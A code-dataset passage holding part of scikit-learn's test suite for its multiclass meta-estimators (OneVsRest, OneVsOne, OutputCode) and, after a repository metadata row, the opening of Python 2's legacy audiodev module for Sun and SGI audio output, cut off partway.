from sklearn.impute import SimpleImputer
from sklearn import svm
from sklearn.exceptions import NotFittedError
from sklearn import datasets
iris = datasets.load_iris()
rng = np.random.RandomState(0)
perm = rng.permutation(iris.target.size)
iris.data = iris.data[perm]
iris.target = iris.target[perm]
n_classes = 3
def test_ovr_exceptions():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
# test predicting without fitting
with pytest.raises(NotFittedError):
ovr.predict([])
# Fail on multioutput data
msg = "Multioutput target data is not supported with label binarization"
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1, 2], [3, 1]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
with pytest.raises(ValueError, match=msg):
X = np.array([[1, 0], [0, 1]])
y = np.array([[1.5, 2.4], [3.1, 0.8]])
OneVsRestClassifier(MultinomialNB()).fit(X, y)
def test_check_classification_targets():
# Test that check_classification_target return correct type. #5782
y = np.array([0.0, 1.1, 2.0, 3.0])
msg = type_of_target(y)
with pytest.raises(ValueError, match=msg):
check_classification_targets(y)
def test_ovr_fit_predict():
# A classifier which implements decision_function.
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
clf = LinearSVC(random_state=0)
pred2 = clf.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) == np.mean(iris.target == pred2)
# A classifier which implements predict_proba.
ovr = OneVsRestClassifier(MultinomialNB())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert np.mean(iris.target == pred) > 0.65
def test_ovr_partial_fit():
# Test if partial_fit is working as intended
X, y = shuffle(iris.data, iris.target, random_state=0)
ovr = OneVsRestClassifier(MultinomialNB())
ovr.partial_fit(X[:100], y[:100], np.unique(y))
ovr.partial_fit(X[100:], y[100:])
pred = ovr.predict(X)
ovr2 = OneVsRestClassifier(MultinomialNB())
pred2 = ovr2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
assert len(ovr.estimators_) == len(np.unique(y))
assert np.mean(y == pred) > 0.65
# Test when mini batches doesn't have all classes
# with SGDClassifier
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
ovr.partial_fit(X[:7], y[:7], np.unique(y))
ovr.partial_fit(X[7:], y[7:])
pred = ovr.predict(X)
ovr1 = OneVsRestClassifier(SGDClassifier(max_iter=1, tol=None,
shuffle=False, random_state=0))
pred1 = ovr1.fit(X, y).predict(X)
assert np.mean(pred == y) == np.mean(pred1 == y)
# test partial_fit only exists if estimator has it:
ovr = OneVsRestClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovr_partial_fit_exceptions():
ovr = OneVsRestClassifier(MultinomialNB())
X = np.abs(np.random.randn(14, 2))
y = [1, 1, 1, 1, 2, 3, 3, 0, 0, 2, 3, 1, 2, 3]
ovr.partial_fit(X[:7], y[:7], np.unique(y))
# If a new class that was not in the first call of partial fit is seen
# it should raise ValueError
y1 = [5] + y[7:-1]
msg = r"Mini-batch contains \[.+\] while classes must be subset of \[.+\]"
with pytest.raises(ValueError, match=msg):
ovr.partial_fit(X=X[7:], y=y1)
def test_ovr_ovo_regressor():
# test that ovr and ovo work on regressors which don't have a decision_
# function
ovr = OneVsRestClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
ovr = OneVsOneClassifier(DecisionTreeRegressor())
pred = ovr.fit(iris.data, iris.target).predict(iris.data)
assert len(ovr.estimators_) == n_classes * (n_classes - 1) / 2
assert_array_equal(np.unique(pred), [0, 1, 2])
# we are doing something sensible
assert np.mean(pred == iris.target) > .9
def test_ovr_fit_predict_sparse():
for sparse in [sp.csr_matrix, sp.csc_matrix, sp.coo_matrix, sp.dok_matrix,
sp.lil_matrix]:
base_clf = MultinomialNB(alpha=1)
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
clf_sprs = OneVsRestClassifier(base_clf).fit(X_train, sparse(Y_train))
Y_pred_sprs = clf_sprs.predict(X_test)
assert clf.multilabel_
assert sp.issparse(Y_pred_sprs)
assert_array_equal(Y_pred_sprs.toarray(), Y_pred)
# Test predict_proba
Y_proba = clf_sprs.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred_sprs.toarray())
# Test decision_function
clf = svm.SVC()
clf_sprs = OneVsRestClassifier(clf).fit(X_train, sparse(Y_train))
dec_pred = (clf_sprs.decision_function(X_test) > 0).astype(int)
assert_array_equal(dec_pred, clf_sprs.predict(X_test).toarray())
def test_ovr_always_present():
# Test that ovr works with classes that are always present or absent.
# Note: tests is the case where _ConstantPredictor is utilised
X = np.ones((10, 2))
X[:5, :] = 0
# Build an indicator matrix where two features are always on.
# As list of lists, it would be: [[int(i >= 5), 2, 3] for i in range(10)]
y = np.zeros((10, 3))
y[5:, 0] = 1
y[:, 1] = 1
y[:, 2] = 1
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label .+ is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict(X)
assert_array_equal(np.array(y_pred), np.array(y))
y_pred = ovr.decision_function(X)
assert np.unique(y_pred[:, -2:]) == 1
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.ones(X.shape[0]))
# y has a constantly absent label
y = np.zeros((10, 2))
y[5:, 0] = 1 # variable label
ovr = OneVsRestClassifier(LogisticRegression())
msg = r'Label not 1 is present in all training examples'
with pytest.warns(UserWarning, match=msg):
ovr.fit(X, y)
y_pred = ovr.predict_proba(X)
assert_array_equal(y_pred[:, -1], np.zeros(X.shape[0]))
def test_ovr_multiclass():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "ham", "eggs", "ham"]
Y = np.array([[0, 0, 1],
[0, 1, 0],
[1, 0, 0],
[0, 0, 1],
[1, 0, 0]])
classes = set("ham eggs spam".split())
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet()):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[0, 0, 4]])[0]
assert_array_equal(y_pred, [0, 0, 1])
def test_ovr_binary():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 0, 5], [0, 5, 0], [3, 0, 0], [0, 0, 6], [6, 0, 0]])
y = ["eggs", "spam", "spam", "eggs", "spam"]
Y = np.array([[0, 1, 1, 0, 1]]).T
classes = set("eggs spam".split())
def conduct_test(base_clf, test_predict_proba=False):
clf = OneVsRestClassifier(base_clf).fit(X, y)
assert set(clf.classes_) == classes
y_pred = clf.predict(np.array([[0, 0, 4]]))[0]
assert_array_equal(y_pred, ["eggs"])
if hasattr(base_clf, 'decision_function'):
dec = clf.decision_function(X)
assert dec.shape == (5,)
if test_predict_proba:
X_test = np.array([[0, 0, 4]])
probabilities = clf.predict_proba(X_test)
assert 2 == len(probabilities[0])
assert (clf.classes_[np.argmax(probabilities, axis=1)] ==
clf.predict(X_test))
# test input as label indicator matrix
clf = OneVsRestClassifier(base_clf).fit(X, Y)
y_pred = clf.predict([[3, 0, 0]])[0]
assert y_pred == 1
for base_clf in (LinearSVC(random_state=0), LinearRegression(),
Ridge(), ElasticNet()):
conduct_test(base_clf)
for base_clf in (MultinomialNB(), SVC(probability=True),
LogisticRegression()):
conduct_test(base_clf, test_predict_proba=True)
def test_ovr_multilabel():
# Toy dataset where features correspond directly to labels.
X = np.array([[0, 4, 5], [0, 5, 0], [3, 3, 3], [4, 0, 6], [6, 0, 0]])
y = np.array([[0, 1, 1],
[0, 1, 0],
[1, 1, 1],
[1, 0, 1],
[1, 0, 0]])
for base_clf in (MultinomialNB(), LinearSVC(random_state=0),
LinearRegression(), Ridge(),
ElasticNet(), Lasso(alpha=0.5)):
clf = OneVsRestClassifier(base_clf).fit(X, y)
y_pred = clf.predict([[0, 4, 4]])[0]
assert_array_equal(y_pred, [0, 1, 1])
assert clf.multilabel_
def test_ovr_fit_predict_svc():
ovr = OneVsRestClassifier(svm.SVC())
ovr.fit(iris.data, iris.target)
assert len(ovr.estimators_) == 3
assert ovr.score(iris.data, iris.target) > .9
def test_ovr_multilabel_dataset():
base_clf = MultinomialNB(alpha=1)
for au, prec, recall in zip((True, False), (0.51, 0.66), (0.51, 0.80)):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=2,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test, Y_test = X[80:], Y[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
Y_pred = clf.predict(X_test)
assert clf.multilabel_
assert_almost_equal(precision_score(Y_test, Y_pred, average="micro"),
prec,
decimal=2)
assert_almost_equal(recall_score(Y_test, Y_pred, average="micro"),
recall,
decimal=2)
def test_ovr_multilabel_predict_proba():
base_clf = MultinomialNB(alpha=1)
for au in (False, True):
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=au,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
# Estimator with predict_proba disabled, depending on parameters.
decision_only = OneVsRestClassifier(svm.SVC(probability=False))
assert not hasattr(decision_only, 'predict_proba')
decision_only.fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
assert hasattr(decision_only, 'decision_function')
# Estimator which can get predict_proba enabled after fitting
gs = GridSearchCV(svm.SVC(probability=False),
param_grid={'probability': [True]})
proba_after_fit = OneVsRestClassifier(gs)
assert not hasattr(proba_after_fit, 'predict_proba')
proba_after_fit.fit(X_train, Y_train)
assert hasattr(proba_after_fit, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
# predict assigns a label if the probability that the
# sample has the label is greater than 0.5.
pred = Y_proba > .5
assert_array_equal(pred, Y_pred)
def test_ovr_single_label_predict_proba():
base_clf = MultinomialNB(alpha=1)
X, Y = iris.data, iris.target
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(base_clf).fit(X_train, Y_train)
# Decision function only estimator.
decision_only = OneVsRestClassifier(svm.SVR()).fit(X_train, Y_train)
assert not hasattr(decision_only, 'predict_proba')
Y_pred = clf.predict(X_test)
Y_proba = clf.predict_proba(X_test)
assert_almost_equal(Y_proba.sum(axis=1), 1.0)
# predict assigns a label if the probability that the
# sample has the label with the greatest predictive probability.
pred = Y_proba.argmax(axis=1)
assert not (pred - Y_pred).any()
def test_ovr_multilabel_decision_function():
X, Y = datasets.make_multilabel_classification(n_samples=100,
n_features=20,
n_classes=5,
n_labels=3,
length=50,
allow_unlabeled=True,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal((clf.decision_function(X_test) > 0).astype(int),
clf.predict(X_test))
def test_ovr_single_label_decision_function():
X, Y = datasets.make_classification(n_samples=100,
n_features=20,
random_state=0)
X_train, Y_train = X[:80], Y[:80]
X_test = X[80:]
clf = OneVsRestClassifier(svm.SVC()).fit(X_train, Y_train)
assert_array_equal(clf.decision_function(X_test).ravel() > 0,
clf.predict(X_test))
def test_ovr_gridsearch():
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovr, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovr_pipeline():
# Test with pipeline of length one
# This test is needed because the multiclass estimators may fail to detect
# the presence of predict_proba or decision_function.
clf = Pipeline([("tree", DecisionTreeClassifier())])
ovr_pipe = OneVsRestClassifier(clf)
ovr_pipe.fit(iris.data, iris.target)
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
assert_array_equal(ovr.predict(iris.data), ovr_pipe.predict(iris.data))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_():
for base_classifier in [SVC(kernel='linear', random_state=0),
LinearSVC(random_state=0)]:
# SVC has sparse coef with sparse input data
ovr = OneVsRestClassifier(base_classifier)
for X in [iris.data, sp.csr_matrix(iris.data)]:
# test with dense and sparse coef
ovr.fit(X, iris.target)
shape = ovr.coef_.shape
assert shape[0] == n_classes
assert shape[1] == iris.data.shape[1]
# don't densify sparse coefficients
assert (sp.issparse(ovr.estimators_[0].coef_) ==
sp.issparse(ovr.coef_))
# TODO: Remove this test in version 1.1
# when the coef_ attribute is removed
@ignore_warnings(category=FutureWarning)
def test_ovr_coef_exceptions():
# Not fitted exception!
ovr = OneVsRestClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovr.coef_
# Doesn't have coef_ exception!
ovr = OneVsRestClassifier(DecisionTreeClassifier())
ovr.fit(iris.data, iris.target)
msg = "Base estimator doesn't have a coef_ attribute"
with pytest.raises(AttributeError, match=msg):
ovr.coef_
# TODO: Remove this test in version 1.1 when
# the coef_ and intercept_ attributes are removed
def test_ovr_deprecated_coef_intercept():
ovr = OneVsRestClassifier(SVC(kernel="linear"))
ovr = ovr.fit(iris.data, iris.target)
msg = (r"Attribute {0} was deprecated in version 0.24 "
r"and will be removed in 1.1 \(renaming of 0.26\). If you observe "
r"this warning while using RFE or SelectFromModel, "
r"use the importance_getter parameter instead.")
for att in ["coef_", "intercept_"]:
with pytest.warns(FutureWarning, match=msg.format(att)):
getattr(ovr, att)
def test_ovo_exceptions():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ovo.predict([])
def test_ovo_fit_on_list():
# Test that OneVsOne fitting works with a list of targets and yields the
# same output as predict from an array
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
prediction_from_array = ovo.fit(iris.data, iris.target).predict(iris.data)
iris_data_list = [list(a) for a in iris.data]
prediction_from_list = ovo.fit(iris_data_list,
list(iris.target)).predict(iris_data_list)
assert_array_equal(prediction_from_array, prediction_from_list)
def test_ovo_fit_predict():
# A classifier which implements decision_function.
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
# A classifier which implements predict_proba.
ovo = OneVsOneClassifier(MultinomialNB())
ovo.fit(iris.data, iris.target).predict(iris.data)
assert len(ovo.estimators_) == n_classes * (n_classes - 1) / 2
def test_ovo_partial_fit_predict():
temp = datasets.load_iris()
X, y = temp.data, temp.target
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:100], y[:100], np.unique(y))
ovo1.partial_fit(X[100:], y[100:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
ovo2.fit(X, y)
pred2 = ovo2.predict(X)
assert len(ovo1.estimators_) == n_classes * (n_classes - 1) / 2
assert np.mean(y == pred1) > 0.65
assert_almost_equal(pred1, pred2)
# Test when mini-batches have binary target classes
ovo1 = OneVsOneClassifier(MultinomialNB())
ovo1.partial_fit(X[:60], y[:60], np.unique(y))
ovo1.partial_fit(X[60:], y[60:])
pred1 = ovo1.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred1, pred2)
assert len(ovo1.estimators_) == len(np.unique(y))
assert np.mean(y == pred1) > 0.65
ovo = OneVsOneClassifier(MultinomialNB())
X = np.random.rand(14, 2)
y = [1, 1, 2, 3, 3, 0, 0, 4, 4, 4, 4, 4, 2, 2]
ovo.partial_fit(X[:7], y[:7], [0, 1, 2, 3, 4])
ovo.partial_fit(X[7:], y[7:])
pred = ovo.predict(X)
ovo2 = OneVsOneClassifier(MultinomialNB())
pred2 = ovo2.fit(X, y).predict(X)
assert_almost_equal(pred, pred2)
# raises error when mini-batch does not have classes from all_classes
ovo = OneVsOneClassifier(MultinomialNB())
error_y = [0, 1, 2, 3, 4, 5, 2]
message_re = escape("Mini-batch contains {0} while "
"it must be subset of {1}".format(np.unique(error_y),
np.unique(y)))
with pytest.raises(ValueError, match=message_re):
ovo.partial_fit(X[:7], error_y, np.unique(y))
# test partial_fit only exists if estimator has it:
ovr = OneVsOneClassifier(SVC())
assert not hasattr(ovr, "partial_fit")
def test_ovo_decision_function():
n_samples = iris.data.shape[0]
ovo_clf = OneVsOneClassifier(LinearSVC(random_state=0))
# first binary
ovo_clf.fit(iris.data, iris.target == 0)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples,)
# then multi-class
ovo_clf.fit(iris.data, iris.target)
decisions = ovo_clf.decision_function(iris.data)
assert decisions.shape == (n_samples, n_classes)
assert_array_equal(decisions.argmax(axis=1), ovo_clf.predict(iris.data))
# Compute the votes
votes = np.zeros((n_samples, n_classes))
k = 0
for i in range(n_classes):
for j in range(i + 1, n_classes):
pred = ovo_clf.estimators_[k].predict(iris.data)
votes[pred == 0, i] += 1
votes[pred == 1, j] += 1
k += 1
# Extract votes and verify
assert_array_equal(votes, np.round(decisions))
for class_idx in range(n_classes):
# For each sample and each class, there only 3 possible vote levels
# because they are only 3 distinct class pairs thus 3 distinct
# binary classifiers.
# Therefore, sorting predictions based on votes would yield
# mostly tied predictions:
assert set(votes[:, class_idx]).issubset(set([0., 1., 2.]))
# The OVO decision function on the other hand is able to resolve
# most of the ties on this data as it combines both the vote counts
# and the aggregated confidence levels of the binary classifiers
# to compute the aggregate decision function. The iris dataset
# has 150 samples with a couple of duplicates. The OvO decisions
# can resolve most of the ties:
assert len(np.unique(decisions[:, class_idx])) > 146
def test_ovo_gridsearch():
ovo = OneVsOneClassifier(LinearSVC(random_state=0))
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ovo, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ovo_ties():
# Test that ties are broken using the decision function,
# not defaulting to the smallest label
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y = np.array([2, 0, 1, 2])
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
ovo_decision = multi_clf.decision_function(X)
# Classifiers are in order 0-1, 0-2, 1-2
# Use decision_function to compute the votes and the normalized
# sum_of_confidences, which is used to disambiguate when there is a tie in
# votes.
votes = np.round(ovo_decision)
normalized_confidences = ovo_decision - votes
# For the first point, there is one vote per class
assert_array_equal(votes[0, :], 1)
# For the rest, there is no tie and the prediction is the argmax
assert_array_equal(np.argmax(votes[1:], axis=1), ovo_prediction[1:])
# For the tie, the prediction is the class with the highest score
assert ovo_prediction[0] == normalized_confidences[0].argmax()
def test_ovo_ties2():
# test that ties can not only be won by the first two labels
X = np.array([[1, 2], [2, 1], [-2, 1], [-2, -1]])
y_ref = np.array([2, 0, 1, 2])
# cycle through labels so that each label wins once
for i in range(3):
y = (y_ref + i) % 3
multi_clf = OneVsOneClassifier(Perceptron(shuffle=False, max_iter=4,
tol=None))
ovo_prediction = multi_clf.fit(X, y).predict(X)
assert ovo_prediction[0] == i % 3
def test_ovo_string_y():
# Test that the OvO doesn't mess up the encoding of string labels
X = np.eye(4)
y = np.array(['a', 'b', 'c', 'd'])
ovo = OneVsOneClassifier(LinearSVC())
ovo.fit(X, y)
assert_array_equal(y, ovo.predict(X))
def test_ovo_one_class():
# Test error for OvO with one class
X = np.eye(4)
y = np.array(['a'] * 4)
ovo = OneVsOneClassifier(LinearSVC())
msg = "when only one class"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ovo_float_y():
# Test that the OvO errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OneVsOneClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_exceptions():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
with pytest.raises(NotFittedError):
ecoc.predict([])
def test_ecoc_fit_predict():
# A classifier which implements decision_function.
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
# A classifier which implements predict_proba.
ecoc = OutputCodeClassifier(MultinomialNB(), code_size=2, random_state=0)
ecoc.fit(iris.data, iris.target).predict(iris.data)
assert len(ecoc.estimators_) == n_classes * 2
def test_ecoc_gridsearch():
ecoc = OutputCodeClassifier(LinearSVC(random_state=0),
random_state=0)
Cs = [0.1, 0.5, 0.8]
cv = GridSearchCV(ecoc, {'estimator__C': Cs})
cv.fit(iris.data, iris.target)
best_C = cv.best_estimator_.estimators_[0].C
assert best_C in Cs
def test_ecoc_float_y():
# Test that the OCC errors on float targets
X = iris.data
y = iris.data[:, 0]
ovo = OutputCodeClassifier(LinearSVC())
msg = "Unknown label type"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
ovo = OutputCodeClassifier(LinearSVC(), code_size=-1)
msg = "code_size should be greater than 0, got -1"
with pytest.raises(ValueError, match=msg):
ovo.fit(X, y)
def test_ecoc_delegate_sparse_base_estimator():
# Non-regression test for
# https://github.com/scikit-learn/scikit-learn/issues/17218
X, y = iris.data, iris.target
X_sp = sp.csc_matrix(X)
# create an estimator that does not support sparse input
base_estimator = CheckingClassifier(
check_X=check_array,
check_X_params={"ensure_2d": True, "accept_sparse": False},
)
ecoc = OutputCodeClassifier(base_estimator, random_state=0)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.fit(X_sp, y)
ecoc.fit(X, y)
with pytest.raises(TypeError, match="A sparse matrix was passed"):
ecoc.predict(X_sp)
# smoke test to check when sparse input should be supported
ecoc = OutputCodeClassifier(LinearSVC(random_state=0))
ecoc.fit(X_sp, y).predict(X_sp)
assert len(ecoc.estimators_) == 4
def test_pairwise_indices():
clf_precomputed = svm.SVC(kernel='precomputed')
X, y = iris.data, iris.target
ovr_false = OneVsOneClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
ovr_false.fit(linear_kernel, y)
n_estimators = len(ovr_false.estimators_)
precomputed_indices = ovr_false.pairwise_indices_
for idx in precomputed_indices:
assert (idx.shape[0] * n_estimators / (n_estimators - 1) ==
linear_kernel.shape[0])
@ignore_warnings(category=FutureWarning)
def test_pairwise_attribute():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._pairwise
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._pairwise
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_tag(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC()
ovr_false = MultiClassClassifier(clf_notprecomputed)
assert not ovr_false._get_tags()["pairwise"]
ovr_true = MultiClassClassifier(clf_precomputed)
assert ovr_true._get_tags()["pairwise"]
# TODO: Remove in 1.1
@pytest.mark.parametrize("MultiClassClassifier", [OneVsRestClassifier,
OneVsOneClassifier])
def test_pairwise_deprecated(MultiClassClassifier):
clf_precomputed = svm.SVC(kernel='precomputed')
ov_clf = MultiClassClassifier(clf_precomputed)
msg = r"Attribute _pairwise was deprecated in version 0\.24"
with pytest.warns(FutureWarning, match=msg):
ov_clf._pairwise
def test_pairwise_cross_val_score():
clf_precomputed = svm.SVC(kernel='precomputed')
clf_notprecomputed = svm.SVC(kernel='linear')
X, y = iris.data, iris.target
for MultiClassClassifier in [OneVsRestClassifier, OneVsOneClassifier]:
ovr_false = MultiClassClassifier(clf_notprecomputed)
ovr_true = MultiClassClassifier(clf_precomputed)
linear_kernel = np.dot(X, X.T)
score_precomputed = cross_val_score(ovr_true, linear_kernel, y)
score_linear = cross_val_score(ovr_false, X, y)
assert_array_equal(score_precomputed, score_linear)
@pytest.mark.parametrize("MultiClassClassifier",
[OneVsRestClassifier, OneVsOneClassifier])
# FIXME: we should move this test in `estimator_checks` once we are able
# to construct meta-estimator instances
def test_support_missing_values(MultiClassClassifier):
# smoke test to check that pipeline OvR and OvO classifiers are letting
# the validation of missing values to
# the underlying pipeline or classifiers
rng = np.random.RandomState(42)
X, y = iris.data, iris.target
X = np.copy(X) # Copy to avoid that the original data is modified
mask = rng.choice([1, 0], X.shape, p=[.1, .9]).astype(bool)
X[mask] = np.nan
lr = make_pipeline(SimpleImputer(),
LogisticRegression(random_state=rng))
MultiClassClassifier(lr).fit(X, y).score(X, y)
| bsd-3-clause |
mchristopher/PokemonGo-DesktopMap | app/pywin/Lib/audiodev.py | 286 | 7597 | """Classes for manipulating audio devices (currently only for Sun and SGI)"""
from warnings import warnpy3k
warnpy3k("the audiodev module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
__all__ = ["error","AudioDev"]
class error(Exception):
pass
class Play_Audio_sgi:
# Private instance variables
## if 0: access frameratelist, nchannelslist, sampwidthlist, oldparams, \
## params, config, inited_outrate, inited_width, \
## inited_nchannels, port, converter, classinited: private
classinited = 0
frameratelist = nchannelslist = sampwidthlist = None
def initclass(self):
import AL
self.frameratelist = [
(48000, AL.RATE_48000),
(44100, AL.RATE_44100),
(32000, AL.RATE_32000),
(22050, AL.RATE_22050),
(16000, AL.RATE_16000),
(11025, AL.RATE_11025),
( 8000, AL.RATE_8000),
]
self.nchannelslist = [
(1, AL.MONO),
(2, AL.STEREO),
(4, AL.QUADRO),
]
self.sampwidthlist = [
(1, AL.SAMPLE_8),
(2, AL.SAMPLE_16),
(3, AL.SAMPLE_24),
]
self.classinited = 1
def __init__(self):
import al, AL
if not self.classinited:
self.initclass()
self.oldparams = []
self.params = [AL.OUTPUT_RATE, 0]
self.config = al.newconfig()
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
if self.port:
self.stop()
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def wait(self):
if not self.port:
return
import time
while self.port.getfilled() > 0:
time.sleep(0.1)
self.stop()
def stop(self):
if self.port:
self.port.closeport()
self.port = None
if self.oldparams:
import al, AL
al.setparams(AL.DEFAULT_DEVICE, self.oldparams)
self.oldparams = []
def setoutrate(self, rate):
for (raw, cooked) in self.frameratelist:
if rate == raw:
self.params[1] = cooked
self.inited_outrate = 1
break
else:
raise error, 'bad output rate'
def setsampwidth(self, width):
for (raw, cooked) in self.sampwidthlist:
if width == raw:
self.config.setwidth(cooked)
self.inited_width = 1
break
else:
if width == 0:
import AL
self.inited_width = 0
self.config.setwidth(AL.SAMPLE_16)
self.converter = self.ulaw2lin
else:
raise error, 'bad sample width'
def setnchannels(self, nchannels):
for (raw, cooked) in self.nchannelslist:
if nchannels == raw:
self.config.setchannels(cooked)
self.inited_nchannels = 1
break
else:
raise error, 'bad # of channels'
def writeframes(self, data):
if not (self.inited_outrate and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import al, AL
self.port = al.openport('Python', 'w', self.config)
self.oldparams = self.params[:]
al.getparams(AL.DEFAULT_DEVICE, self.oldparams)
al.setparams(AL.DEFAULT_DEVICE, self.params)
if self.converter:
data = self.converter(data)
self.port.writesamps(data)
def getfilled(self):
if self.port:
return self.port.getfilled()
else:
return 0
def getfillable(self):
if self.port:
return self.port.getfillable()
else:
return self.config.getqueuesize()
# private methods
## if 0: access *: private
def ulaw2lin(self, data):
import audioop
return audioop.ulaw2lin(data, 2)
class Play_Audio_sun:
## if 0: access outrate, sampwidth, nchannels, inited_outrate, inited_width, \
## inited_nchannels, converter: private
def __init__(self):
self.outrate = 0
self.sampwidth = 0
self.nchannels = 0
self.inited_outrate = 0
self.inited_width = 0
self.inited_nchannels = 0
self.converter = None
self.port = None
return
def __del__(self):
self.stop()
def setoutrate(self, rate):
self.outrate = rate
self.inited_outrate = 1
def setsampwidth(self, width):
self.sampwidth = width
self.inited_width = 1
def setnchannels(self, nchannels):
self.nchannels = nchannels
self.inited_nchannels = 1
def writeframes(self, data):
if not (self.inited_outrate and self.inited_width and self.inited_nchannels):
raise error, 'params not specified'
if not self.port:
import sunaudiodev, SUNAUDIODEV
self.port = sunaudiodev.open('w')
info = self.port.getinfo()
info.o_sample_rate = self.outrate
info.o_channels = self.nchannels
if self.sampwidth == 0:
info.o_precision = 8
self.o_encoding = SUNAUDIODEV.ENCODING_ULAW
# XXX Hack, hack -- leave defaults
else:
info.o_precision = 8 * self.sampwidth
